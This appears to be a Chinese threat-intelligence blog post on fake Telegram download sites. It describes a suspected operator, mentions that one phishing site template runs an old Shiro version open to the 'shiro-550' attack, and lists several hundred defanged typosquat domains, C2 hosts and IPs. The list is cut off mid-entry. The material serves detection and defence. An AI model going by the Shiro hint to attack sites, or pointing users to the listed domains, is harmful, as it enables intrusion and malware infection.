src="https://wechat2rss.xlab.app/img-proxy/?k=0d7edfd8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzib6Y2VQDspibzkrriacia5YdXic4M2QIrkRSpZl5VYDnXP9JpvhfGqwF5oQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.027777777777777776" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8311965e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz2rlTpUcJZbZhE7GHGw3NXyhgicgRopYQdgUNghZID1DHDPyG5blUPicw%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.11203703703703703" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=33691dcc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzxpPaZ6AxW1VD4nGvpkF5tFEUiaavEHflNOibpt8QUWD4vvl2eht95zEw%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.2847141190198366" data-s="300,640" style="" data-type="png" data-w="857" src="https://wechat2rss.xlab.app/img-proxy/?k=1b675d8e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzEMTHUPrib4WGVicEB2AZWnTSnvuvUicvuN7vUwzXzqJvxRsFWibbZGp8vw%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>嘿客竟在我身边<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">微信群里偶然看到有人咨询如何解决下载exe文件时chrome报毒的问题</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5907407407407408" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c87e1c1c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzmdQkbKPNWOnfiaicndMDJHLv5MF4dZBhbhMjkoYZ2MaJfOYPGwjk2nlA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">文件名称命名流派属于上文提到的 ”官方写实派“</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.212" data-s="300,640" style="" data-type="png" data-w="500" src="https://wechat2rss.xlab.app/img-proxy/?k=9473ca81&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzPIsArophiawFnkWkSDVPEzIYKicNunyo7UKARauxSeZiadKoPpebPAbGQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">下面又在咨询谷歌快照的收录问题</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3990740740740741" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=14ed550c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzTSDvWtZHNpLV758ic4tVIQU6I5yzesC2OXhoEYPVHbXMYHMkgjbicUrw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">以及苍白的辩解</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7046296296296296" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=5eb115e6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzUUAibyVYAE0zC0nhuxEABw1QlTiadysOsx1KbBt411gkR9WqQyhP1B5w%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">根据以上特征可以推断出此人极大概率是个假TG站长</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.1824074074074074" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=e38534d9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz7290UE2K2PI5kq36KSjZycP4jus9L7WNziaYnx4iapuM3Fn7og4qwceQ%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>漏洞<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">有套模板用了低版本shiro，可以打个550。安骑士守护，值得信赖。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5509259259259259" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c41e38b2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzic6icKV9hGEbOJSE5ObY7qRzcIrVSATiay8E0MOibg1LvINdCLvX7BZGiag%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5296296296296297" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=60e8cc6c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTznNvr97koxDB5pmMugK11UDxMibUBFz9O00CQiaiamfOfvQ8B6oQgrkc5Q%2F640%3Fwx_fmt%3Dpng"/></p><p style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">app分发也有</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5638888888888889" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=29917351&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzgCkX3EwCRiajN3kHQavIv8TkSalEdicHEG5PjkSogaAM9rQSJtFrPUtw%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.25092592592592594" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=f3720e41&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzibbsd9W7ahe3vJxIMCXcpPuW8tkgbW60pmEpuqBmoU1kGabln7V9NLw%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>分享下ioc<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">写完有一段时间了，发现近几天谷歌封禁的速度貌似快了起来，整这些活的貌似也少了不少，遂赶紧发出来蹭个尾巴。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">分享一波目前收集到的域名，共计608个，其中绝大多数是围绕 fake_tg 的官网、下载域名、C2、相似攻击ioc。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">未打码版放在夏老师星际黑客文档：<a href="https://txt.xj.hk/fake_t" target="_blank">https://txt.xj.hk/fake_t</a></p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRoh1cJ9oEONNca6ibN1Dc5pXKfKSHZhjUZZyvIQn5eBns3j4DoP0SlcRg4UE8Gibvicayy3aGAyw20JgqJ8xXXvDmA/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">f[.]nkking[.]com<br/>103[.]212[.]231[.]151<br/>download3[.]htfoifm[.]xyz<br/>tg-telegram[.]vip<br/>teleprannm[.]com<br/>down[.]tg-zc[.]com<br/>tg-zc[.]com<br/>zhlatrst-38tgle[.]org<br/>jungen[.]oss-accelerate[.]aliyuncs[.]com<br/>daboluo-dl[.]netlify[.]app<br/>telegrem-zg[.]netlify[.]app<br/>tgdsafsagoogle[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>tg-ch[.]com<br/>tgelegramch[.]xyz<br/>telegrarn[.]eu<br/>tgsgp[.]oss-ap-southeast-1[.]aliyuncs[.]com<br/>zh-telegram[.]net<br/>rhfudncm[.]xyz<br/>telegramr[.]co<br/>telegrarn[.]work<br/>telepanm[.]top<br/>telegram[.]kiwi<br/>telegam[.]health<br/>uv7zzq[.]dm[.]files[.]1drv[.]com<br/>telegrarn[.]one<br/>taleglam[.]com<br/>www[.]talesgian[.]com<br/>www[.]telegram-tgp3[.]com<br/>www[.]telegram-tgp5[.]com<br/>telegrarn[.]<span style="color: #c678dd;line-height: 26px;">in</span><br/>telegrann[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>telegarn[.]org<br/>teledown1[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>telegrma[.]cc<br/>telegarsm[.]com<br/>www[.]tg-telegram[.]pro<br/>download90[.]srdna[.]com<br/>telegram[.]training<br/>ttelte[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>wahadp[.]com<br/>download[.]dsvcfwp[.]cn<br/>www[.]tg-telegram[.]org<br/>789-1306961415[.]cos[.]ap-hongkong[.]myqcloud[.]com<br/>www[.]telegram-com[.]cc<br/>tg-telegram[.]pro<br/>telegramzh[.]cc<br/>download[.]telegram[.]lgbt<br/>telegramzw[.]com[.]cn<br/>yyds10133[.]oss-accelerate[.]aliyuncs[.]com<br/>telergam[.]live<br/>122121ffff[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>tehegiam[.]com<br/>tellegram[.]group<br/>telegraem[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>telegraem[.]cn<br/>xgtele[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>telegraem[.]vip<br/>tlssatwla[.]com<br/>telegrarn[.]pw<br/>www[.]telegram-o[.]cc<br/>apk[.]telegramx[.]me<br/>789822[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>tg-zw[.]com<br/>teleglam-zz[.]com<br/>e80255c45d527cc415b7526391f6d9f5[.]oss-accelerate[.]aliyuncs[.]com<br/>hx4fne[.]gz3k[.]world<br/>k4n[.]8uft[.]world<br/>w[.]kuai-lian[.]vip<br/>gg[.]telenet[.]vip<br/>tg-telegram[.]biz<br/>tg-telegram[.]org<br/>2a561b9384674c115296be162e54ee6e[.]oss-accelerate[.]aliyuncs[.]com<br/>telegmas[.]com<br/>xkck-dl[.]netlify[.]app<br/>telegremkz[.]com<br/>www[.]telegremkz[.]com<br/>telegrarn[.]win<br/>1231313879[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>telegram-zz[.]com<br/>telegram-download[.]cloud<br/>tpcsy[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>teleegram[.]art<br/>www[.]telegarsa[.]life<br/>www[.]telegarsc[.]top<br/>telegram-download[.]fun<br/>telegram-download[.]cyou<br/>www[.]talagem[.]com<br/>talagram[.]shop<br/>zsdownload1[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>www[.]tellagrem[.]com<br/>telegrem-zg[.]com<br/>telegkam[.]com<br/>telegrarmcnzz[.]com<br/>telegram-1313815604[.]cos[.]ap-singapore[.]myqcloud[.]com<br/>telegrmam[.]org<br/>www[.]telegradm[.]com<br/>teyegarm[.]org<br/>www[.]telegramxi[.]com<br/>570c805dc6a7845a6733f91b7196bed0[.]oss-accelerate[.]aliyuncs[.]com<br/>telegroms[.]com<br/>www[.]teleam[.]health<br/>telegream[.]tv<br/>tg-zhongwen1[.]cc<br/>web[.]mjlfyqrr[.]xyz<br/>www[.]telegram--download[.]com<br/>www[.]telegaarm[.]com<br/>telepram[.]com<br/>xvsdgvgsdrbg[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>download69[.]srdna[.]com<br/>download[.]telegramc[.]xyz<br/>www[.]telegramm[.]vip<br/>telegloam[.]com<br/>137[.]220[.]146[.]224<br/>www[.]telegramvip[.]xyz<br/>telegrano[.]org<br/>www[.]telegramgl[.]com[.]cn<br/>telegarmd[.]com<br/>zstelegram[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>451bf881a688a12c8ff794d089531831[.]oss-accelerate[.]aliyuncs[.]com<br/>www[.]tleamaa[.]com<br/>telegcrem[.]com<br/>telegreng[.]com<br/>www[.]tellegram[.]zone<br/>tellegram[.]host<br/>telgram[.]health<br/>btcdl[.]netlify[.]app<br/>telegarmm[.]netlify[.]app<br/>29e221f1ca4868201606d3[.]oss-accelerate[.]aliyuncs[.]com<br/>telegcerm[.]com<br/>www[.]telegeram[.]ink<br/>apk-telegram[.]com<br/>telegramr[.]xyz<br/>telegram<span style="line-height: 26px;">-a</span>[.]org<br/>www[.]telegramm[.]ink<br/>telergam[.]top<br/>afsaf1[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>www[.]telelgrzm[.]com<br/>drhhrddtery2[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>www[.]tleamoa[.]com<br/>felegram[.]lol<br/>telegarm[.]one<br/>telegrarm[.]art<br/>tele[.]bkve[.]cn<br/>m[.]teoegram[.]com<br/>www[.]buchananapp[.]com<br/>app[.]buchananapp[.]com<br/>pc[.]buchananapp[.]com<br/>upload[.]buchananapp[.]com<br/>172[.]67[.]173[.]103<br/>104[.]21[.]72[.]9<br/>telegramdo[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>telegrma[.]vip<br/>dows[.]kuai-lian[.]vip<br/>tenetgamg[.]top<br/>tgelegramzh[.]xyz<br/>telegremg[.]cc<br/>telegrarn[.]cc<br/>www[.]telegrarn[.]cc<br/>teleprann[.]com<br/>telegrmas[.]com<br/>telegram30-chinese[.]com<br/>telegrak[.]com<br/>tele[.]kuai-lian[.]vip<br/>telegrrann[.]org<br/>telegramr[.]org<br/>tg11184[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>www[.]talagren[.]com<br/>e06aac69edcc89ff9b1b92e9f2528ab7[.]oss-accelerate[.]aliyuncs[.]com<br/>123-1306961415[.]cos[.]ap-hongkong[.]myqcloud[.]com<br/>telegarn[.]xyz<br/>china-teleglam[.]com<br/>telegramet123[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>telegramgc[.]com<br/>inso-a88[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>www[.]telegrgn[.]net<br/>qsflww[.]bn[.]files[.]1drv[.]com<br/>www[.]telegrarn[.]ink<br/>601f3d2aa2bda7d42f51bce0782dc81b[.]oss-accelerate[.]aliyuncs[.]com<br/>telegrms[.]com<br/>www[.]zhtelegram[.]org<br/>zhtelegram[.]org<br/>www[.]telegramzh[.]co<br/>telegramzh[.]co<br/>www[.]telegrbm[.]net<br/>telegrbm[.]net<br/>www[.]telegramom[.]org<br/>telegramom[.]org<br/>www[.]telegram[.]family<br/>telegram[.]family<br/>www[.]telegramb[.]com<br/>telegramb[.]com<br/>hbxvrhaw[.]bar<br/>www[.]telogrem[.]com<br/>download[.]teleegramvv[.]xyz<br/>download[.]telegronm[.]xyz<br/>www[.]telegramxe[.]org<br/>telegaarm[.]ink<br/>www[.]telasgram[.]com<br/>www[.]telegroom[.]com<br/>www[.]telegrvn[.]com<br/>a1com[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>www[.]telegaagm[.]com<br/>www[.]telegram-asd[.]com<br/>www[.]telegrarn[.]us<br/>www[.]telegrxam[.]com<br/>www[.]telegram1[.]vip<br/>www[.]telegrrm[.]net<br/>www[.]teleegran[.]org<br/> www[.]teleegran[.]org<br/>telegraan[.]org<br/>teleegran[.]org<br/>download[.]telegraam[.]vip<br/>download[.]telegramhome[.]org<br/>download2[.]rtgvbny[.]xyz<br/>teracnm[.]top<br/>download[.]telegramp[.]xyz<br/>telegrraam[.]cuyocxs[.]cn<br/>tele1[.]ouygqmq[.]cn<br/>tele[.]ebimdfg[.]cn<br/>teler[.]oabuynet[.]com[.]cn<br/>telegramzh[.]org<br/>telegrarn[.]com<br/>www[.]telegcn[.]com<br/>telegrarcn[.]com<br/>telergem[.]org<br/>down[.]tggdown[.]com<br/>www[.]telegrram[.]buzz<br/>www[.]telegarms[.]vip<br/>bakdownload[.]srdna[.]com<br/>download[.]tellegrom[.]com<br/>www[.]yobestategov[.]com<br/>tellegrom[.]com<br/>sites[.]pqict[.]cn<br/>cri-5amnsqb5sb53590h-registry[.]oss-accelerate[.]aliyuncs[.]com<br/>www[.]telegrambo[.]org<br/>china-teleglem[.]com<br/>www[.]telegaam[.]org<br/>tghka7[.]oss-ap-southeast-1[.]aliyuncs[.]com<br/>zw-telegam[.]com<br/>www[.]teleagrem[.]com<br/>talegramn[.]org<br/>txun[.]s3[.]ap-northeast-2[.]amazonaws[.]com<br/>www[.]totater[.]com<br/>k-telegram[.]app<br/>zh-cntelegram[.]com<br/>telecom-site[.]com<br/>asqpqe[.]com<br/>telegrame[.]online<br/>www[.]cn-teiegram[.]xyz<br/>www[.]telegramsu[.]com<br/>telechina[.]oss-accelerate[.]aliyuncs[.]com<br/>telebisa[.]com<br/>abc-telegram[.]com<br/>www[.]tgstpaa[.]top<br/>tgbkc1[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>mi-telegram[.]com<br/>www[.]tegygram[.]com<br/>appmobi[.]online<br/>tele-lyon[.]com<br/>ryxsdg8[.]space<br/>www[.]telegarn[.]co<br/>super-telegram[.]com<br/>www[.]teleramg[.]org<br/>www[.]telegrems[.]com<br/>www[.]telegham[.]org<br/>download[.]telergems[.]com<br/>telemram[.]com<br/>www[.]tleagnz[.]com<br/>telencgram[.]com<br/>www[.]taijuaa[.]store<br/>telegarm[.]shop<br/>telegracm[.]cn<br/>telagrcm[.]com<br/>telegrams[.]cloud<br/>www[.]telegramn[.]top<br/>www[.]t-telegram[.]org<br/>telsgrams[.]com<br/>telegrams-app[.]org<br/>telengrm[.]com<br/>www[.]telegrampcn[.]com<br/>talagram-zh[.]com<br/>www[.]tglegram[.]org<br/>www[.]whatsappg[.]com<br/>teleagram[.]vip<br/>www[.]telegrab[.]org<br/>www[.]telagad[.]com<br/>www[.]telagtiem[.]xyz<br/>www[.]telegrabs[.]com<br/>telematica-uk[.]com<br/>telegrem[.]bid<br/>anyrepeater[.]com<br/>www[.]lrvr[.]org<br/>telegram88[.]xyz<br/>www[.]teleldcn[.]com<br/>telegramzhcn[.]org<br/>telegramst[.]com<br/>www[.]telegramst[.]com<br/>www[.]tgcn[.]cash<br/>www[.]telegramxiazai[.]com<br/>www[.]telegram-chinas[.]com<br/>www[.]telegrcm[.]org<br/>www[.]telegrsm[.]net<br/>download3[.]fugbnh[.]xyz<br/>en-telegram[.]com<br/>154[.]39[.]64[.]225<br/>telegarms[.]xyz<br/>27[.]124[.]34[.]177<br/>www[.]luckfafa[.]com<br/>210[.]56[.]54[.]12<br/>microsoftdefender[.]luckfafa[.]com<br/>14[.]192[.]67[.]187<br/>wpsupdate[.]luckfafa[.]com<br/>45[.]116[.]161[.]95<br/>45[.]116[.]161[.]95 <br/>googleupdate[.]luckfafa[.]com<br/>b[.]nkking[.]com<br/>www[.]nkking[.]com<br/>193[.]218[.]38[.]149<br/>c[.]nkking[.]com<br/>193[.]218[.]38[.]148<br/>d[.]nkking[.]com<br/>193[.]218[.]38[.]82<br/>telergam[.]xyz<br/>143[.]92[.]61[.]121<br/>107[.]148[.]45[.]48<br/>12-16[.]pinyin-sougou[.]com<br/>107[.]148[.]35[.]6<br/>occ-a6[.]oss-accelerate[.]aliyuncs[.]com<br/>www[.]firefoxs[.]org<br/>a2net[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>edfbdc7fc81abad462efa6688c19482a[.]oss-accelerate[.]aliyuncs[.]com<br/>api18[.]srdna[.]com<br/>download88[.]srdna[.]com<br/>download[.]telegran[.]fit<br/>download95[.]srdna[.]com<br/>download[.]telebram[.]com<br/>dhdkenxke[.]xyz<br/>www[.]tleamaa[.]net<br/>china-telegrme[.]com<br/>telegorm[.]com<br/>zh[.]slqhtz[.]cn<br/>www[.]telegran[.]fit<br/>telebram[.]com<br/>telegrgm[.]xyz<br/>f2-lang[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>dow-a15[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>dow-a11[.]oss-accelerate[.]aliyuncs[.]com<br/>www[.]teledown[.]org<br/>cdndown[.]shop<br/>laohuzhi[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>download82[.]srdna[.]com<br/>www[.]telamvz[.]com<br/>www[.]tlergam[.]xyz<br/>www[.]telegraysm[.]com<br/>www[.]telamse[.]com<br/>www[.]telamad[.]com<br/>www[.]telamsf[.]com<br/>www[.]telamfs[.]com<br/>telegram-android[.]org<br/>telegnm[.]com<br/>telegraman[.]com<br/>www[.]telegracm[.]org<br/>www[.]telegramxx[.]com<br/>www[.]telegvn[.]com<br/>www[.]telegraxm[.]net<br/>www[.]telegima[.]xyz<br/>www[.]telagtiem[.]com<br/>www[.]telegima[.]com<br/>www[.]telegima[.]top<br/>www[.]cn-teledown[.]com<br/>download[.]telegramm[.]work<br/>www[.]telegramm[.]work<br/>telegaam[.]org<br/>zh-telegram[.]app<br/>www[.]tgdown[.]org<br/>telegram[.]me<br/>www[.]telegram[.]com[.]pe<br/>telagran[.]com<br/>telegramgb[.]com<br/>telearnm[.]com<br/>telegram[.]surf<br/>telegramrm[.]com<br/>www[.]telegramv[.]org<br/>kitgafpslmj102047[.]telegrammessenger[.]xyz<br/>telegramcn[.]org<br/>telegriem[.]com<br/>www[.]telegramsg[.]org<br/>telegramlinux[.]com<br/>telegvcn[.]com<br/>www[.]telegramlk[.]org<br/>5c4488d628a64861d71a396bbafbf4b2[.]oss-accelerate[.]aliyuncs[.]com<br/>telgm-zw[.]com<br/>telegranm[.]net<br/>www[.]telegnam[.]com<br/>tg404[.]com<br/>telegramz[.]me<br/>www[.]teleincn[.]com<br/>54ggssdfr[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>52telegram[.]com<br/>www[.]telegramac[.]com<br/>telegrampc[.]org<br/>www[.]telebigi[.]com<br/>www[.]telegkn[.]com<br/>www[.]telegramce[.]com<br/>download[.]telegraema[.]com<br/>telegram-cn[.]org<br/>www[.]tevegram[.]com<br/>cn-telagrem[.]com<br/>telegrammj[.]com<br/>www[.]telegrgm[.]com<br/>www[.]telegcm[.]com<br/>www[.]telegramns[.]com<br/>www[.]telegramopen[.]co<br/>telegmm[.]com<br/>www[.]telegramyy[.]com<br/>telegramcs[.]com<br/>download[.]telegramm[.]cloud<br/>telegrampl[.]com<br/>telegrzm[.]com<br/>www[.]teleylm[.]com<br/>clomidus[.]com<br/>www[.]webk-telegram[.]org<br/>626f8c47c30ce[.]site123[.]me<br/>www[.]telegraka[.]com<br/>app[.]zhaixz[.]com<br/>telegramgi[.]com<br/>telagrem-zn[.]com<br/>www[.]telegham[.]com<br/>www[.]telegdn[.]com<br/>www[.]telegrfm[.]com<br/>www[.]telegnm[.]com<br/>www[.]telegrames[.]org<br/>u5x9ckzpj7910225[.]gettelegram[.]xyz<br/>f953b4a29c6253a0b43ca25601710c32[.]oss-accelerate[.]aliyuncs[.]com<br/>telgram[.]cn<br/>tgdowm[.]com<br/>app[.]telegranyy[.]com<br/>8qw2hl54c9p105654[.]telegramwindows[.]xyz<br/>telegram[.]gs<br/>telegpn[.]com<br/>downs[.]telcp213[.]com<br/>www[.]teleggam[.]com<br/>www[.]telegramdh[.]com<br/>telegqn[.]com<br/>www[.]telegram[.]farm<br/>telegrcn[.]org<br/>www[.]telelgracn[.]com<br/>www[.]telegkam[.]com<br/>www[.]skypocn[.]com<br/>telegrjm[.]com<br/>wwv[.]telegramdm[.]com<br/>www[.]telegrann[.]org<br/>www[.]telegram-c[.]com<br/>www[.]telegramstr[.]com<br/>telegbam[.]com<br/>aptne[.]com<br/>telegrlm[.]com<br/>telegram-install[.]com<br/>tlegrem[.]com<br/>www[.]telegranak[.]com<br/>www[.]telegxn[.]com<br/>www[.]telegcsm[.]com<br/>www[.]telegpam[.]com<br/>telegtrm[.]com<br/>telegrtm[.]com<br/>www[.]telepang[.]com<br/>www[.]telegracn[.]org<br/>ttelgram[.]com<br/>telegrn[.]com<br/>ww[.]telegwm[.]com<br/>telegram-v7[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>telegwn[.]com<br/>www[.]telegbm[.]com<br/>wwv[.]telegrfm[.]com<br/>www[.]telegrarnm[.]org<br/>www[.]telegramae[.]com<br/>chinesetelecn[.]vip<br/>teleglon[.]com<br/>www[.]telegrambu[.]com<br/>tgsgp[.]oss-accelerate[.]aliyuncs[.]com<br/>www[.]telegrantn[.]com<br/>www[.]chinesetelecn[.]vip<br/>www[.]potacn[.]com<br/>www[.]telegramm[.]cloud<br/>teletgarm[.]com<br/>telegram-chian[.]org[.]cn<br/>telegrammacos[.]org<br/>zh-cn-channel[.]telagarm[.]com<br/>telegarnm[.]com<br/>teiegrcm[.]com<br/>telegramrn[.]com<br/>teleglam-cn[.]com<br/>www[.]telegrampx[.]com<br/>www[.]telecgram[.]org<br/>www[.]telegramcl[.]com<br/>www[.]teleylc[.]com<br/>3s3wy68jxy311850[.]telegramlinux[.]xyz<br/>telegpam[.]com<br/>gettelegram[.]org<br/>telegramde[.]com<br/>telegrab[.]org<br/>www[.]telegram-china[.]org<br/>www[.]telegrhm[.]com<br/>www[.]telegramcq[.]org<br/>www[.]telegramdi[.]com<br/>www[.]telepve[.]com<br/>cn-teleglam[.]com<br/>telegran[.]one<br/>www[.]telegtcn[.]com<br/>www[.]skypebee[.]com<br/>telegvm[.]com<br/>www[.]telegramau[.]com<br/>telegram-w1[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>www[.]telegramga[.]com<br/>www[.]telegrambx[.]com<br/>telegram2[.]com<br/>telegramapp[.]cn<br/>telecnsr[.]com<br/>telegramsku[.]com<br/>www[.]telcp[.]com<br/>chip-usa[.]com<br/>www[.]telegrancf[.]com<br/>www[.]teleghn[.]com<br/>www[.]telgcn[.]com<br/>download81[.]srdna[.]com<br/>www[.]telezj[.]com<br/>telegrammessenger[.]cn<br/>telergems[.]com<br/>www[.]harleyfanzone[.]com<br/>jjkmxv[.]com<br/>www[.]telegramdj[.]com<br/>383f66e5f63bef91845f5a4e22ae5be5[.]oss-accelerate[.]aliyuncs[.]com<br/>telegramapp[.]pro<br/>telegramam[.]org<br/>www[.]telegrammc[.]com<br/>www[.]telegramim[.]org<br/>telegfn[.]com<br/>telegzm[.]com<br/>telegrnam[.]com<br/>telegram-24[.]com<br/>www[.]telegdam[.]com<br/>telegramwindows[.]org<br/>www[.]telegramos[.]org<br/>www[.]telegramapp[.]vip<br/>telegrannn[.]com<br/>www[.]telegramracn[.]org<br/>tgcn[.]top<br/>www[.]telegranhk[.]com<br/>www[.]telegraema[.]com<br/>telegram[.]965rock[.]com<br/>telegram[.]wpcoder[.]cn<br/>www[.]telegmramcn[.]com<br/>www[.]cntegrom[.]com<br/>27[.]124[.]46[.]23<br/>www[.]telegramcj[.]com<br/>www[.]telegvam[.]org<br/>tgramarn[.]com<br/>telegrammacos[.]com<br/>www[.]telegramv[.]com<br/>telegrambt[.]com<br/>telegramwindows[.]com<br/>telegrambq[.]com<br/>www[.]telegfam[.]com<br/>telegranzh[.]com<br/>w